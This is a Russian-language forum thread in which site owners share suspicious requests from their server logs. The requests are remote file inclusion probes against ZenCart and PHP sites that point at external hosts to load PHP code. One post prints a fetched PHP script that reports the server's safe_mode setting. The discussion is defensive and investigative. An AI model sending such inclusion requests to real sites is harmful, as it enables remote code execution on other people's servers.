1

Тема: Странный запрос

Сегодня ночью очень странный запрос был на форуме:

/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://channels.dal.net/irwan/test.txt?

с адреса 85.17.200.74
Зашел по урлу который в запросе прописан, а там какой-то php скрипт прописан smile
Кто с этим сталкивался?
Дырки ищут? И я так понимаю через настройки сервера.
Или я не прав?

Моя сборка FluxBB 1.4

Сайт Visman

Поделиться

2

Re: Странный запрос

Дырки, но не в настройках сервера, а в движке магазина ZenCart  :  www.xakep.ru/post/33407/default.asp

Сайт hcs

Поделиться

3

Re: Странный запрос

Ясно

Моя сборка FluxBB 1.4

Сайт Visman

Поделиться

4

Re: Странный запрос

Вот еще странный запрос smile

/index.php?title=http://angel.yum.pl/joomla/images/borda10.jpg?
Моя сборка FluxBB 1.4

Сайт Visman

Поделиться

5

Re: Странный запрос

Ага была подобная фигня, раза 3.

/viewtopic.php=http://мутный_хостинг.*.jpg

Тоже насторожило. Явно попытка выполнить код.

Сайт private_joker

Поделиться

6

Re: Странный запрос

А вот и содержание якобы gif файла.

<?php
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "Modo_Seguro_off"; }
else { $SafeMode = "Modo_Seguro_on"; } 
echo $SafeMode;
?>

Чет им интересно стало включен ли сейфмод или нет. Ip дает *****.veloxzone.com.br скрипт был залит на какой-то словацкий инет-магазин.
Озадачилсо...

Сайт private_joker

Поделиться

7

Re: Странный запрос

На уровне браузера с этой бякой борются или нет? Интересно.

Моя сборка FluxBB 1.4

Сайт Visman

Поделиться